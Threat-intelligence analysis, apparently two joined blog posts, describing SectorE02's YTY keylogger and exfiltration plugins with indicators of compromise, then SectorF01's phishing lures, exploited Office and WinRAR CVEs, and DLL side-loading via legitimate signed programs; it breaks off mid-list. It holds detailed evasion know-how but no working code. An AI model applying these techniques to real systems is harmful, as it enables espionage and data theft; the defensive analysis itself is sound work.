The strings can be deobfuscated by running both the base64 and reverse algorithm three times

File Listing Plugin (d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa)

This executable plugin recursively searches through the “C:”, “D:”, “E:”, “F:”, “G:”, and “H:” drives, looking for interesting file extensions shown below. Several default folders are avoided by the malware.

Note that the “.inp” extension is for “Urdu InPage”, a word processing program which supports languages such as Urdu which is the national language of Pakistan. The extensions the 2019 version of this plugin did not previously look for are “.odt” and “.eml”, and “.rft” is just a spelling mistake they made of “.rtf”.

The latest version of the plugin looks for files with containing any of 14 different file extensions

It only looks for files modified later than year 2017 and saves the text data of all matching files found in %APPDATA%\DriveData\Files\clist.log using the format of “File Path|Size WriteTimestamp l_flag”.

File path and names for exfiltration are saved to a clist.log file

A copy of these matching files are also saved to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. The copied files are individually saved with the file names being the full file path to the copied file, with slashes becoming underscores.

Exact copies of files the plugin is looking for is saved to the common exfiltration folder

Keylogger Plugin (f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37)

This plugin starts off by using CreateEventA as a mutex with the value “k4351”. It saves user keystrokes and which window title those keystrokes were pressed in the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. The file is saved as “<username>_YYYY_MM_DD(HH_mm_ss).txt”.

Example of input captured by the keylogger plugin

Uploader Plugin (d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e)

This plugin starts off by using CreateEventA as a mutex with the value “MyEvent3525” and only works if the file %USERPROFILE%\DriveData\Files\win.txt exists . While the other plugins dump their files into the common exfiltration folder, the uploader plugin takes the files from that folder and uploads it to the C2 server, which is the same server as the downloader C2 server. The uploaded files are deleted immediately after.

The uploader performs a HTTP POST to /upload/<computername> of the file using HTTP forms with the same hard coded user-agent as their downloader malware, “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”.

Data sent to the C2 server through HTTPS for exfiltration

Summary

While the use of a modular framework is not a new concept, we see that the SectorE02 group’s continuous remaking of their YTY framework plugins which serve the same purpose allows them to keep detections by security tools at a minimum. Based on their campaigns and the plugins we have seen, we believe they may be recreating each plugin on a per-campaign basis, meaning that each attack campaign might be targeting with new binaries coded from scratch and be hardly detected by security tools. At the same time, their newfound cautiousness in protecting their binaries from being downloaded and limited targeting means that the hardest part of detecting and responding to the SectorE02 group may be finding their related binaries in the first place.

Indicators of Compromise

Malicious Excel Files (SHA-256)

1f64ab4db42ad68b4b99120ef6e9d1409cf606d31d932c0d306bb11c8ddcb2b4
5a70d423fb336448fc7a71fbc3c7a4f0397bc7fa1ec32f7cc42824a432051c33
95ea070bbfca04fff58a7092d61527aad0474914ffd2501d96991faad1388c7a
fdcf3873df6f83336539c4997ce69fce459737c6d655f1972422f861437858a9
6d0a3c4b2414c59be1190710c09330f4dd07e7badc4194e592799783f1cfd055
7703c3385894dd3468c468745c747bf5c75f37a9b1fcaf2a1d0f291ecb7abce6
aa1c8adc4b7d352e487842b1d3017f627230ff1057350aaca1ffeb4d6abae16a
a06a5b1d63ca67da90ba6cd9cbc00d6872707a1b49d44de26d6eb5ce7dd7d545
cc2c2694d0284153605a98c0e7493fb90aff0d78e7f03e37c80fb505fbf3f93f
6d0a3c4b2414c59be1190710c09330f4dd07e7badc4194e592799783f1cfd055
42775c20aa5b73b2eaecb5b107ce59d105f978660e6e43f53f804733ce3f7cbe
f0c85a1c9cf80ad424acebbe7af54176d0cb778a639da2f2f59828af5bb79842

Dropped Batch Scripts (SHA-256)

92b12010772166647f510ad91731e931d58bc077bfc9f9d39adc678cc00fb65d
1b46735d6b6aebefd5809274de1aaa56b5fac314b33c2fa51b001e07b4f7e4d7
57a9a17baaf61de5cffa8b2e2ec340a179e7e1cd70e046cbd832655c44bc7c1d
cd03ed9e4f3257836e11016294c8701baa12414b59f221e556cbed16a946b205
ce1df70e96b4780329d393ff7a37513aec222030e80606ee3ef99b306951d74d
9169dab8579d49253f72439f7572e0aabeb685c5ca63bf91fff81502764e79bb

Dropped YTY Downloaders (SHA-256)

5acfd1b49ae86ef66b94a3e0209a2d2a3592c31b57ccbaa4bb9540fcf3403574
08b11f246e2ebcfc049f198c055fc855e0af1f8499ba18791e3232efa913b01a
62dfec7fe0025e8863c2252abb4ec1abdb4b916b76972910c6a47728bfb648a7
13f27543d03fd4bee3267bdc37300e578994f55edabc031de936ff476482ceb4
b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384
e726c07f3422aaee45187bae9edb1772146ccac50315264b86820db77b42b31c

YTY File Plugin

8fff7f07ebf0a1e0a4eabdcf57744739f39de643d831c36416b663bd243590e1
d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa

YTY Screenshot Plugin

f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5

YTY Keylogger Plugin

f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37

YTY File Exfiltration Uploader Plugin

d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e

IP Addresses

179[.]43[.]170[.]155
5[.]135[.]199[.]26

Domains

data-backup[.]online
servicejobs[.]life

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution

Persistence

T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1107 File Deletion
T1158 Hidden Files and Directories
T1066 Indicator Removal from Tools
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1064 Scripting

Credential Access

T1056 Input Capture

Discovery

T1010 Application Window Discovery
T1083 File and Directory Discovery
T1082 System Information Discovery
T1497 Virtualization/Sandbox Evasion

Collection

T1119 Automated Collection
T1005 Data from Local System
T1039 Data from Network Shared Drive
T1025 Data from Removable Media
T1074 Data Staged
T1114 Email Collection
T1056 Input Capture
T1113 Screen Capture

Command and Control

T1043 Commonly Used Port
T1071 Standard Application Layer Protocol

Exfiltration

T1020 Automated Exfiltration
T1041 Exfiltration Over Command and Control Channel

References

[1] Microsoft Docs | localtime, _localtime32, _localtime64
https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/localtime-localtime32-localtime64?view=vs-2019

The Growth of SectorF01 Group’s Cyber Espionage Activities

Abstract

Since 2013, there has been a hacking group receiving support from the national level which conducts cyber espionage campaigns against countries in the South China Sea. We refer to this group as SectorF01. From 2017, their activities have increased significantly. They mainly carry out these campaigns against government agencies and diplomatic, military, and research institutions in neighboring countries, and surveillance activities against opposing forces in their own countries.

In recent years, the SectorF01 group has been engaged in cyber espionage against various industries for its own benefit. They put extra focus on the automobile industry, and their targets countries have expanded to include South Korea and Japan as well, which are in the East Asian region. We decided to take a step-by-step look at more than 800 types of malware used by the SectorF01 group from 2013 until now (H1 2019). In this post, we will focus on the initial penetration methods that the SectorF01 group uses against their targets. We will see that they love using DLL side-loading.

Targets

Target Countries

The SectorF01 group conducts cyber espionage mainly in countries in Southeast Asia and East Asia. The victims are the countries around the South China Sea, and these countries belong to the Association of Southeast Asian Nations (ASEAN).

The SectorF01 group’s intensive attack targets are in the following countries:

• Vietnam
• China
• Cambodia
• Laos
• Thailand
• Myanmar
• Phillipines
• Malaysia
• Indonesia
• Singapore

Recently, they have also been expanding their cyber espionage activities to the following countries in East Asia:

• Japan
• South Korea

Targets of the SectorF01 group

The ellipses marked with red dotted lines are the range of countries targeted by the SectorF01 group, and the dark red ellipses are the range of countries where the attack is more concentrated. The ellipses, marked with orange dotted lines, are a range of countries that have recently been included in the attack target as the SectorF01 group expands their activities.

Target Industries

The SectorF01 group conduct cyber espionage activities against various fields as follows:

• Vietnamese dissidents, journalists, and activists
• ASEAN-related organizations
• Government institutions
• Diplomatic institutions
• Military institutions
• Marine-related organizations : Maritime organizations, marine research institutes, shipping companies, etc
• Scientific research institutes
• Universities and educational institutions
• Foreign companies in Vietnam
• Automotive Industry

Statistics for Cyber Espionage Activities in SectorF01 Group

The SectorF01 group has seen steady annual grown since its inception as a cyber espionage player in 2013 and has become one of the most influential threat actor groups in Southeast Asia. We created statistics about their activities through the more than 800 malware executables that the SectorF01 group used to attack.

About 800 malwares used in the statistics are all Windows executables. Polymorphic binaries which are executed by sandboxes and whose file hashes change each time they are run are excluded from these statistics, so only the initial file is included. We are excluding such polymorphic binaries which are not used in attacks to minimize statistical errors and misinterpretation.

This is a graph aggregating the number of malwares used in attacks by the SectorF01 group every year. It can be seen that the number of malware that they use each year is steadily increasing.

The Growth of the SectorF01 group’s Malware

The following are the statistics for the time and day when the SectorF01 group created the malware. We have analyzed about seven years of cyber espionage activity of the SectorF01 group and have concluded that they are highly likely to be threat actor groups sponsored by the Vietnamese government. We created statistics on compile times with the timestamp of about 500 binaries, after excluding those considered to have modified timestamps among the 800 binaries.

Assuming that the SectorF01 group is active in Vietnam, we set the time zone to “UTC+7″(Vietnam time zone) and created statistics based on that. Considering that the business hours in Vietnam are mainly from 8:00 am to 5:00 pm, about 68% of the malwares were created in Vietnam business hours. Also, binaries were rarely created at lunch time.

SectorF01 Group’s Malware Compile Time (UTC+7)

Next, we created statistics for the days when the SectorF01 group created binaries. The SectorF01 group made binaries on weekdays rather than weekends. About 86% of malware were made on weekdays. Among them, most binaries were produced on Mondays.

The days of the week that the SectorF01 group compiled their binaries

SectorF01 Groups’s Initial Access Tactics

The SectorF01 group uses a variety of methods for initial penetration. They mainly use malware delivered to the target via email attachments and at other times, infect specific targets that access websites via watering hole attacks. Here we describe the various initial penetration methods they have used.

Spearphishing Attachment & Spearphishing Link

The SectorF01 group usually delivers their malware through email attachments or links. The definition of these techniques can be found in the MITRE ATT&CK Framework.

“Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.”
MITRE ATT&CK – T1193, Spearphishing Attachment


“Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.”
MITRE ATT&CK – T1192, Spearphishing Link


Below, we can see the various ways malware is sent through attachments or links in emails used by the SectorF01 group.

Delivery Method 1: How Executable Files are Delivered

(1.1) Executable file disguised as normal document file

The SectorF01 group uses a executable that masquerades as a normal document file, such as a Word or PDF document, etc., causing the user to mistake the document file for execution. They change the icon of the file to the icon of the document program or add a document file extension such as “.doc” or “.pdf” before the “.exe” executable file extension. This causes the user to mistake the file as a document file. These executables are usually compressed and delivered in the form of email attachments.

(1.2) Malware disguised as normal program

The SectorF01 group changes the malware file name to be a file name of a normal program such as a web browser installation file (Firefox, Chrome), or an Adobe Flash web browser plug-in installation file. In addition, malware was distributed by disguising as a normal program used only in the target country.

Malware disguised as normal program installation file

(1.3) Malware using the “Space after Filename” technique

The SectorF01 group uses the “Space after Filename” technique to make the executable look like a normal document file. Inserting the document file extension, such as “.doc”, “.docx”, before the “.exe” extension, and inserting many spaces in the middle. Depending on the size of the filename field, the long “.exe” extension will not be visible due to the long space, and the user might misunderstand the executable as a document file.

Executable file disguised as document file through “Space after Filename” technique

(1.4) Malware contained in RAR archive

The SectorF01 group mainly creates malware in the form of compressed archives for delivering malicious executable files or document files and delivers them to the attack target. The compression formats they have used in the past are RAR, ZIP, GZIP, though the SectorF01 group mainly uses the RAR compression format.

Malware included in RAR archive

(1.5) SFXZIP autorun compressed file malware

The SectorF01 group also uses SFX (self-extracting archive) autorun compression file malware. They utilize the WinRAR program’s ability to generate SFX compressed files to generate malware with the ZIP compression format rather than the RAR compression format.

SFX compressed file creation method of ZIP compression format using WinRAR program
ZIP compression format SFX compressed file type malware

(1.6) Malware distribution method using HTA

The SectorF01 group uses HTA to spread malware. HTA stands for Microsoft HTML Applications and uses the “.hta” extension. A typical HTA file is configured to be similar to a HTML file, but is run as a separate utility program called “mshta.exe”, not a web browser like Internet Explorer. The SectorF01 group spreads malware by including VBScript in the “.hta” file, and that VBScript works by dropping the embedded malware or downloading additional malware. The advantage here is that while VBScript has limited privileges in a web browser due to security controls, these security controls are bypassed when the VBScript is executed via a HTA file.

Malware delivered in the form of an HTA file
VBScript to generate malware contained in HTA file

(1.7) Malware distribution method using Shortcut (LNK)

The SectorF01 group uses shortcut (“.lnk”) files to spread malware. Such LNK files can execute commands. They set the LNK file to run VBScript code using the “mshta.exe” program. It is delivered to the target by disguising icons and extensions which look like word document files. If the target mistakes the LNK file for a document file and executes it, then the VBScript code is executed to download and execute an additional malware file from a server.

The following is a malicious LNK file used by the SectorF01 group:

Malware delivered in the form of an LNK file
Malicious LNK files to download and run additional malware

(1.8) Deliver malware download link using cloud service

The SectorF01 group uses Amazon’s AWS S3 and Dropbox cloud storage services to upload malware, and that link is delivered via email.

Delivery Method 2: How malware is executed using macros

(2.1) Attacks using macros contained in a document

The SectorF01 group mainly delivers word documents containing macros to the target. The filename of the document is set to be something the target might be interested in and they attach the document to their email. The victim will not be infected if the malicious macro does not run, so the document body contains a social engineering technique to encourage the user to activate the macro.

Malicious Word document file with macros
Malicious macros contained in Word documents

(2.2) Attacks that convert macros to ActiveMime form

Word document files containing traditional malicious macros are more easily detected by security solutions such as antivirus and anti-spam filters. To bypass this, the SectorF01 group also uses the ActiveMime format. ActiveMime is an undocumented Microsoft file format that encodes macros in Microsoft Office. When you convert a Microsoft Office document that contains a macro to the “.mht (Microsoft Web Archive)” format, the macro is included in the “.mht” file in ActiveMime format. These converted macros can bypass security solutions because they can be detected only by analyzing the ActiveMime format.

The SectorF01 group changed the extension of the malicious document which was converted to “.mht” file format to the “.doc” extension and attached it to the email and delivered it to the target.

MHT malware with ActiveMime masquerading as a DOC file
ActiveMime format with malicious macros
A screen Run Word document file containing macro converted to ActiveMime

Delivery Method 3: Deploy malware using vulnerabilities

The SectorF01 group exploits vulnerabilities that are frequently used. These exploits are already used by many attackers, so it can mask the attacker’s characteristics to some extent.

(3.1) CVE-2017-0199

The CVE-2017-0199 vulnerability is a vulnerability that occurs because Microsoft Office programs does not properly handle OLE objects. A malicious file such as HTA (HTML Application) can be downloaded and executed from a remote server through a vulnerability that occurs when MS Office processes URL Moniker object.

The SectorF01 group used the CVE-2017-0199 vulnerability to deliver an RTF document containing a malicious OLE2link object to the target. The OLE2link object downloads the VBScript HTA file containing the Powershell command to run.

(3.2) CVE-2017-8570

The CVE-2017-8570 vulnerability is a vulnerability that occurs because Microsoft Office programs can not properly handle OLE objects. This vulnerability exists in the way MS Office handles Composite Moniker objects and can execute SCT (Windows Script Component) scripts included in OLE packages.

The SectorF01 group uses the CVE-2017-8570 vulnerability to deliver an RTF document containing a malicious “.sct” file that generates malware to the target.

Malicious documents using CVE-2017-8570 vulnerability

(3.3) CVE-2017-11882

The CVE-2017-11882 vulnerability is a vulnerability that occurs when the Equation Editor (EQNEDT32.EXE), a component of the MS Office program, fails to properly handle certain objects. While MS Office is processing certain objects in memory, it can execute arbitrary code through the vulnerability.

The SectorF01 group attacked by delivering a malicious RTF document with shellcode for generating malware using the CVE-2017-11882 vulnerability to the target.

Malicious documents using CVE-2017-11882 vulnerability
CVE-2017-11882 Vulnerability Code

(3.4) CVE-2018-20250

The CVE-2018-20250 vulnerability occurs in UNACEV2.dll, which is included in the compression program WinRAR. This is a vulnerability that can generate a file in a specific path by manipulating the file name field in the processing of ACE compression format. This allows an attacker to create an executable file in a path where the file can be executed automatically at system boot time, such as a “startup program”.

As many threat actor groups began to use the CVE-2018-20250 vulnerability, the SectorF01 group also did the same.

Malware using CVE-2018-20250 vulnerability

Delivery Method 4: Drive-by Compromise (Watering Hole)

The SectorF01 group infects targets that access legitimate sites by inserting malicious scripts into the normal website after hacking it in order to steal account information or to infect malware. This attack is known as Drive-by Compromise. Attackers choose websites that are frequently visited by specific targets rather than indiscreet website hacking, and this attack is also called a watering hole attack.

“A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is targeted for exploitation.”
MITRE ATT&CK – T1189, Drive-by Compromise


The SectorF01 group targeted specific individuals or organizations by attacking websites that were primarily visited by key personnel and activists who opposed the Vietnamese government. They have also attacked websites of government, diplomacy, defense and research areas of Vietnam, including Cambodia, China, Laos and the Philippines, and hacked ASEAN-related websites.

The following is the timing of the large-scale watering hole attacks by the SectorF01 group:

• May 2014, September 2014
• January 2015, March 2015
• May 2017
• September 2018, December 2018
• January 2019

When a target accesses a specific web site, the attacker distributes malware disguised as a web browser program or a plug-in, or displays a fake login page for collecting credential data. They also created domains similar to a normal website or online services and malicious scripts were inserted into fake domain websites to collect information about their targets.

TOO MUCH LOVE for DLL Side-Loading

The SectorF01 group prefers the “DLL Side-Loading” technique to execute their malware. DLL side-loading technique is also called “DLL Hijacking”, “DLL Preloading”, and “DLL Planting”. The MITRE ATT&CK Framework defines “DLL Side-Loading” as follows.

“Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.”
Definition of DLL Side-Loading


When DLLs are loaded in Windows OS, the order of searching is as follows:

1. The directory from which the application loaded.
2. The current directory.
3. The system directory. Use the GetSystemDirectory function to get the path of this directory.
4. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
5. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
Dynamic-Link Library Search Order


Because the DLL file is in the same directory path as the executable file, that DLL is loaded as it has the load highest priority. The SectorF01 group distributes the legitimate file and the malicious DLL file together so that they are in the same path. This will load the malicious DLLs together when the normal file is executed.

This will make it seem as though it is a DLL file being loaded by a legitimate program and this can bypass detection of an endpoint security solution that performs behavior-based detection.

The SectorF01 group has distributed MS Windows OS files or popular programs with DLLs to load their malicious DLL files. In some cases, the legitimate files of famous anti-virus software are also used to load malicious DLLs.

The SectorF01 group loves the “DLL Side-Loading” technique so much that they abused many legitimate programs. We wondered how many normal programs were exploited, so we summarized all the normal programs we found.

The normal program files used by the SectorF01 group for “DLL Side Loading” are as follows:

• Microsoft Office Word (WINWORD.EXE)
• Windows Search (SearchIndexer.exe)
• Windows Search (SearchProtocolHost.exe)
• Google Update (GoogleUpdate.exe)
• Adobe AcroTranscoder (AcroTranscoder.exe)
• Adobe Flash Player Control Panel Applet (FlashPlayerApp.exe)
• Adobe Acrobat 3D Utility (A3DUtility.exe)
• WeChat (WeChat.exe)
• Coc Coc Browser Update (CocCocUpdate.exe)
• 360安全浏览器 (360 Secure Browser) (360se.exe)
• 60软件管家 (360 Software Manager) (SoftManager.exe)
• Neuber Software Typograf font manager (FontSets.exe)
• McAfee VirusScan On-Demand Scan (mcods.exe)
• McAfee Oem Module (mcoemcpy.exe)
• Symantec Network Access Control (rastlsc.exe)
• Kaspersky Anti-Virus Installation assistant host (avpia.exe)
• Kaspersky Light Plugin Extension Registrar (plugins-setup.exe)
• Avast Antivirus remediation (wsc_proxy.exe)

They used major programs from Microsoft, Google and Adobe, and used popular local programs such as WeChat, Coc Coc Browser, and 360 Secure Browser. They also used programs from anti-virus vendors such as McAfee, Symantec, Kaspersky, and Avast.

Side Load 1 – Microsoft Office Word (WINWORD.EXE)

The SectorF01 group used the normal “WINWORD.EXE” file from “Microsoft Office Word” to utilize the “DLL Side-Loading” technique. The normal “WINWORD.EXE” file loads a “wwlib.dll” DLL file.

The normal “WINWORD.EXE” file sequentially searches the following paths to check if it exists in order to load the “wwlib.dll”.

The file “Ho so dang ky lam dai ly uy quyen chinh thuc cua Huyndai – Thanh Cong – Nguyen Thi Mai Phuong.exe” file has a filename related to the topic that the target may be interested in. This is the normal file “WINWORD.EXE” with only the name changed.

They set the file name of their malicious DLL to be “wwlib.dll” and deploy it in the same path along with the renamed normal “WINWORD.EXE” file. When the victim executes this renamed “WINWORD.EXE”, the malicious “wwlib.dll” file is loaded and malware is executed.

The following shows the code in “WINWORD.EXE” that loads the “wwlib.dll” exported “FMain”.

The malicious DLL “wwlib.dll” is loaded and calls the Export function “FMain”.

The “FMain” of the malicious DLL “wwlib.dll” contains the malicious code.

Side Load 2 – Windows Search (SearchIndexer.exe)

The SectorF01 group used the normal “SearchIndexer.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “SearchIndexer.exe” file loads a “msfte.dll” DLL file.

They set the file name of their malicious DLL to be “msfte.dll” and deploy it in the same path along with the renamed normal “SearchIndexer.exe” file. When the victim executes this renamed “SearchIndexer.exe”, the malicious “msfte.dll” file is loaded and malware is executed.

The following shows the code in “SearchIndexer.exe” loading the “msfte.dll”.

Side Load 3 – Windows Search (SearchProtocolHost.exe)

The SectorF01 group used the normal “SearchProtocolHost.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “SearchProtocolHost.exe” file loads a “msfte.dll” DLL file.

They set the file name of their malicious DLL to be “msfte.dll” and deploy it in the same path along with the renamed normal “SearchProtocolHost.exe” file. When the victim executes this renamed “SearchProtocolHost.exe”, the malicious “msfte.dll” file is loaded and malware is executed.

The following shows the code in “SearchProtocolHost.exe” loading the “msfte.dll”.

Side Load 4 – Google Update (GoogleUpdate.exe)

The SectorF01 group used the normal “GoogleUpdate.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “GoogleUpdate.exe” file loads a “goopdate.dll” DLL file.

They set the file name of their malicious DLL to be “goopdate.dll” and deploy it in the same path along with the renamed normal “GoogleUpdate.exe” file. When the victim executes this renamed “GoogleUpdate.exe”, the malicious “goopdate.dll” file is loaded and malware is executed.

Side Load 5 – Adobe AcroTranscoder (AcroTranscoder.exe)

The SectorF01 group used the normal “AcroTranscoder.exe” file from AcroTranscoder software to utilize the “DLL Side-Loading” technique.

The normal “AcroTranscoder.exe” file loads a “Flash Video Extension.dll” DLL file.

The following is a malicious word document “FW Report on demonstration of former CNRP in Republic of Korea.doc” used by the SectorF01 group.

When this document is executed, the malicious DLL “Flash Video Extension.dll” and the renamed legitimate “AcroTranscoder.exe” are deployed in the same path. When the normal “AcroTranscoder.exe” is executed, the malicious “Flash Video Extension.dll” file is loaded and malware is executed.

The malicious DLL “Flash Video Extension.dll” is loaded and calls the Export API functions. The SectorF01 group put their malicious code in the “FLVCore :: Uninitialize” function, while all other functions point to the same address as the “FLVCore :: Uninitialize” function. Thus, as long as any Export API of the “Flash Video Extension.dll” is called, the malware is executed.

The “FLVCore :: Uninitialize” export function of the malicious DLL “Flash Video Extension.dll” contains code that performs malicious actions.

Side Load 6 – Adobe Flash Player Control Panel Applet (FlashPlayerApp.exe)

The SectorF01 group used the normal “FlashPlayerApp.exe” (Adobe Flash Player Control Panel Applet software) to utilize the “DLL Side-Loading” technique. The normal “FlashPlayerApp.exe” file loads a “UxTheme.dll” DLL file.

They set the file name of their malicious DLL to be “UxTheme.dll” and deploy it in the same path along with the renamed normal “FlashPlayerApp.exe” file. When the victim executes this renamed “FlashPlayerApp.exe”, the malicious “UxTheme.dll” file is loaded and malware is executed.

Side Load 7 – Adobe Acrobat 3D Utility (A3DUtility.exe)

The SectorF01 group used the normal “A3DUtility.exe” (Adobe Acrobat 3D Utility software) to utilize the “DLL Side-Loading” technique. The normal “A3DUtility.exe” file loads DLLs such as a “BIB.dll” DLL file.

The SectorF01 group sets the name of their malicious DLLs to “ACE.dll”, “AGM.dll”, “CoolType.dll”, “MSVCP80.dll”, “MSVCR80.dll” in addition to “BIB.dll”. They distribute these files together with the renamed normal “A3DUtility.exe” in the same path. These different DLL files are all loaded by the normal “A3DUtility.exe”.

The following shows the code in “A3DUtility.exe” loading the “AGM.dll”, “BIB.dll”, “CoolType.dll”, and so on.

“BIB.dll” is loaded and the Export API function is called. The malicious code of the SectorF01 group is inserted into the “BIB_12” function, and all other function addresses point to the “BIB_12” function address. This allows their malware to work no matter what Export API in “BIB.dll” is called. The other malicious DLLs are configured in the same way.

The exported functions of “BIB.dll”

The “BIB_12” function in “BIB.dll” contains the malicious code.

When the normal “A3DUtility.exe” is executed, the malicious DLL files is loaded and malware is executed.

Side Load 8 – WeChat (WeChat.exe)

The SectorF01 group used the normal “WeChat.EXE” (WeChat software) to utilize the “DLL Side-Loading” technique. The normal “WeChat.EXE” file loads a “WeChatWin.dll” DLL file.

WeChat is a famous Chinese messenger program.

They set the file name of their malicious DLL to be “WeChatWin.dll” and deploy it in the same path along with the renamed normal “WeChat.exe” file. When the victim executes this renamed “WeChat.exe”, the malicious “WeChatWin.dll” file is loaded and malware is executed.

Side Load 9 – Coc Coc Browser Update (CocCocUpdate.exe)

The SectorF01 group used the normal “CocCocUpdate.exe” (Coc Coc Browser Update Software) to utilize the “DLL Side-Loading” technique. The normal “CocCocUpdate.exe” file loads a “coccocpdate.dll” DLL file.

“Coc Coc Browser” is a famous web browser in Vietnam.

The following shows the code in “CocCocUpdate.exe” that loads the “coccocpdate.dll” “DllEntry” function.

They set the file name of their malicious DLL to be “coccocpdate.dll” and deploy it in the same path along with the renamed normal “CocCocUpdate.exe” file. When the victim executes this renamed “CocCocUpdate.exe”, the malicious “coccocpdate.dll” file is loaded and malware is executed.

The “DllEntry” function in “coccocpdate.dll” contains the malicious code.

Side Load 10 – 360安全浏览器 (360 Secure Browser) (360se.exe)

The SectorF01 group used the normal “360se.exe” (360安全浏览器 – 360 Secure Browser) to utilize the “DLL Side-Loading” technique. The normal “360se.exe” file loads a “chrome_elf.dll” DLL file.

“360安全浏览器(360 Secure Browser)” is a famous web browser in China.

The following shows the code in “360se.exe” that loads the “chrome_elf.dll” “SignalInitializeCrashReporting” Export API function.

They set the file name of their malicious DLL to be “chrome_elf.dll” and deploy it in the same path along with the renamed normal “360se.exe” file. When the victim executes this renamed “360se.exe”, the malicious “chrome_elf.dll” file is loaded and malware is executed.

“chrome_elf.dll” is loaded and the Export API function “SignalInitializeCrashReporting” is called.

The “SignalInitializeCrashReporting” function in “chrome_elf.dll” contains the malicious code.

Side Load 11 – 360软件管家 (360 Software Manager) (SoftManager.exe)

The SectorF01 group used the normal “SoftManager.exe” (360软件管家 – 360 Software Manager) to utilize the “DLL Side-Loading” technique. The normal “SoftManager.exe” file loads a “dbghelp.dll” DLL file.

“360软件管家(360 Software Manager)” is a famous software management program in China.

They set the file name of their malicious DLL to be “dbghelp.dll” and deploy it in the same path along with the renamed normal “SoftManager.exe” file. When the victim executes this renamed “SoftManager.exe”, the malicious “dbghelp.dll” file is loaded and malware is executed.

Side Load 12 – Neuber Software Typograf font manager (FontSets.exe)

The SectorF01 group used the normal “FontSets.exe” (Neuber Software Typograf font manager) to utilize the “DLL Side-Loading” technique. The normal “FontSets.exe” file loads a “FaultRep.dll” DLL file.

“Neuber Software Typograf font manager” is a famous font management program.

“FontSets.exe” loads the “FaultRep.dll” file from the same path as the program executed according to the DLL load order of Windows DLLs, before the file is loaded from the Windows system folder.

The following shows the code in “FontSets.exe” that loads the “FaultRep.dll” DLL.

They set the file name of their malicious DLL to be “FaultRep.dll” and deploy it in the same path along with the renamed normal “FontSets.exe” file. When the victim executes this renamed “FontSets.exe”, the malicious “FaultRep.dll” file is loaded and malware is executed.

Side Load 13 – McAfee VirusScan On-Demand Scan (mcods.exe)

The SectorF01 group used the normal “mcods.exe” (McAfee VirusScan On-Demand Scan) to utilize the “DLL Side-Loading” technique. The normal “mcods.exe” file loads a “McVsoCfg.dll” DLL file.

The SectorF01 group utilized normal files of Anti-Virus programs and exploited the fact that these files are usually whitelisted by other security products and that their behavior might be exempted from monitoring.

The normal “mcods.exe” file loads a “McVsoCfg.dll” DLL file.

“McVsoCfg .dll” is loaded and the Export API function “McVsoCfgGetObject” is called. The “McVsoCfgGetObject” function in “McVsoCfg.dll” contains the malicious code.

They set the file name of their malicious DLL to be “McVsoCfg.dll” and deploy it in the same path along with the renamed normal “mcods.exe” file. When the victim executes this renamed “mcods.exe”, the malicious “McVsoCfg.dll” file is loaded and malware is executed.

Side Load 14 – McAfee Oem Module (mcoemcpy.exe)

The SectorF01 group used the normal “mcoemcpy.exe” (McAfee Oem Module) to utilize the “DLL Side-Loading” technique. The normal “mcoemcpy.exe” file loads a “McUtil.dll” DLL file.

They set the file name of their malicious DLL to be “McUtil.dll” and deploy it in the same path along with the renamed normal “mcoemcpy.exe” file. When the victim executes this renamed “mcoemcpy.exe”, the malicious “McUtil.dll” file is loaded and malware is executed.

Side Load 15 – Symantec Network Access Control (rastlsc.exe)

The SectorF01 group used the normal “rastlsc.exe” (Symantec Network Access Control) to utilize the “DLL Side-Loading” technique. The normal “rastlsc.exe” file loads a “RasTls.dll” DLL file.

They set the file name of their malicious DLL to be “RasTls.dll” and deploy it in the same path along with the renamed normal “rastlsc.exe” file. When the victim executes this renamed “rastlsc.exe”, the malicious “RasTls.dll” file is loaded and malware is executed.

Side Load 16 – Kaspersky Anti-Virus Installation assistant host (avpia.exe)

The SectorF01 group used the normal “avpia.exe” (Kaspersky Anti-Virus Installation Assistant host) to utilize the “DLL Side-Loading” technique. The normal “avpia.exe” file loads a “product_info.dll” DLL file.

